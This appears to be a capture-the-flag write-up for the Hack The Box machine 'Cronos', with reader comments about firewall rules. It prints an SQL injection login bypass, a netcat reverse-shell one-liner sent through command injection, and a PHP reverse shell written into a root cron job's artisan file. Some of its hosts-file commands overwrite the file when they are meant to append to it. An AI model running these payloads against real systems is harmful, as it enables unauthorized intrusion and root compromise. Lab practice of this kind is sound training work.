Let’s get started!

Level: medium

Reconnaissance

This is the initial step in order to scan the open services in the machine.

COMMAND: nmap -sC -sV -O -oA cronos 10.10.10.13

As you can see from the above the nmap scan result 3 ports open !

Let’s open the webpage.

URL:http://10.10.10.13

We got the default Apache2 page !

Since we only get a default page when browsing to the page using the machine’s IP address, we may want to consider that there could be virtual host routing in play. If we edit our /etc/hosts file to add the machine’s name cronos.htb and then revisit the page we now get a different page:

COMMAND: echo “10.10.10.13 cronos.htb” > /etc/hosts

Let’s revisit the page again!

URL: cronos.htb

The server is running laravel framework and we can do the further enumeration with nikto and gobuster.

root@exp1o1t9r:~# gobuster dir -u http://cronos.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large
 -directories.txt                                                                                      
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://cronos.htb
 [+] Threads:        10
 [+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Timeout:        10s
2020-1-23 13:14:41 Starting gobuster
 /js (Status: 301)
 /css (Status: 301)
 /server-status (Status: 403)
root@exp1o1t9r:~/htb/machines/cronos-10.10.10.13# nikto -h cronos.htb
 - Nikto v2.1.6
 Target IP:          10.10.10.13
 Target Hostname:    cronos.htb
 Target Port:        80 
 + Start Time:         2020-1-23 13:15:02 (GMT-5)
 Server: Apache/2.4.18 (Ubuntu)
 The anti-clickjacking X-Frame-Options header is not present.
 The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 Cookie XSRF-TOKEN created without the httponly flag
 No CGI Directories found (use '-C all' to force check all possible dirs)
 Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
 Allowed HTTP Methods: GET, HEAD 
 OSVDB-3092: /web.config: ASP config file is accessible.
 OSVDB-3268: /css/: Directory indexing found.
 OSVDB-3092: /css/: This might be interesting…
 OSVDB-3233: /icons/README: Apache default file found.
 7785 requests: 0 error(s) and 10 item(s) reported on remote host 
 + End Time:           2019-12-25 13:20:45 (GMT-5) (343 seconds)
 1 host(s) tested 

Since we’re not seeing anything jump out at us right away, now would be a good time to take a step back and review the other services we haven’t enumerated yet. Let’s explore DNS and see if we can do a zone transfer for the cronos.htb domain.

COMMAND: host -l cronos.htb 10.10.10.13

As from the above results , we need to add all the hosts in out hosts file.

COMMAND:

echo “10.10.10.13 admin.cronos.htb” > /etc/hosts
echo “10.10.10.13 ns1.cronos.htb” > /etc/hosts
echo “10.10.10.13 www.cronos.htb” > /etc/hosts

admin.cronos.htb looks very promising…

After adding admin.cronos.htb to /etc/hosts, let’s navigate to it:

A login page, lets attempt to bypass using SQL Injection

admin' or '1'='1

We got logined successfully and we will try use command injection and execute linux commands !

Command Injection is possible,So we will use a reverse shell python one-liner:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.30 1234 >/tmp/f

BOOM! we got the shell !

Privilege Escalation

Let’s take a look at crontab as the machine name is CRONOS!!
COMMAND: cat /etc/crontab

By checking the crontab we know that artisan is running as root!

Let’s use the artisan and get the root shell:)

We need to modify the artisan file with the reverse shell and setup netcat listener as shown below image!

echo ''<?php $sock=fsockopen("10.10.14.30",9999);exec("/bin/sh -i &3 2>&3"); ?>' > /var/www/laravel/artisan 

nc -nlvp 9999

Finally got the root shell and pwned the root flag:)

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r

3 COMMENTS

  1. Hey mate,

    Thanks for this awesome write up.

    “echo “10.10.10.13 admin.cronos.htb” > /etc/hosts”
    In the above command I would use “>>” to append to the hosts file, I believe “>” just overwrites the hosts file.

    MY personal takeaway from this box:
    I experienced an awkward circumstance on this box, in which none of reverse shells were working, I tried about 4 different shell codes and all were unsuccessful. This is when Burp Suite takes forever on waiting for a response from the server and literally helps nothing. First, I thought that there should be a problem with server bandwidth or this special box might be quit busy at this time. Then I decided to used tcpdump to capture transactions between server and my machine on tun0 where I can watch ping echo/req and other TCP segments and IP packets . Since tcpdump output is not as pleasant as Wireshark I replayed the network test using Wireshark and at that time I noticed that after handshake there are 5 TCP re-transmission occurring from server to my machine which means all get droped at my end, This normally caused due to issues at layer 1 and 2 of OSI model as a result of network/TCP congestion. However, this time all packets were being dropped by UFW on my machine. This can be addressed by adding a rule to accept reverse shell from that specific IP/port into ufw’s INPUT chain, or temporarily deactivating UFW (not recommended, otherwise you know what you are doing).

    ufw add rule, simplest solution:
    $sudo ufw allow 4434/tcp

    * when 4434 is the port specified in nc.
    $nc -lvnp 4434

    • Thanks for your comment!
      I didn’t add any rule because I just use netcat simply as it does everything for us by typing a simple command.
      Your way of approach is different and everyone has there own approach.
      Just try to build new way of pwning the machine as you doing now:)

  2. You are right, what comes to my mind is, UFW | iptables are disabled by default on most distros, means there is no firewall activated by default after setting up the Linux OS e.g. Kali linux, Ubuntu, despite the UFW is . That might be the reason you did not need to any rule to firewall.

    The reason behind it is Linux distros are not shipped with any open ports by default, so there is no need to have firewall enable as there is no open port to protect.

    https://askubuntu.com/questions/22667/why-is-the-firewall-disabled-by-default

    Cheers

LEAVE A REPLY

Please enter your comment!
Please enter your name here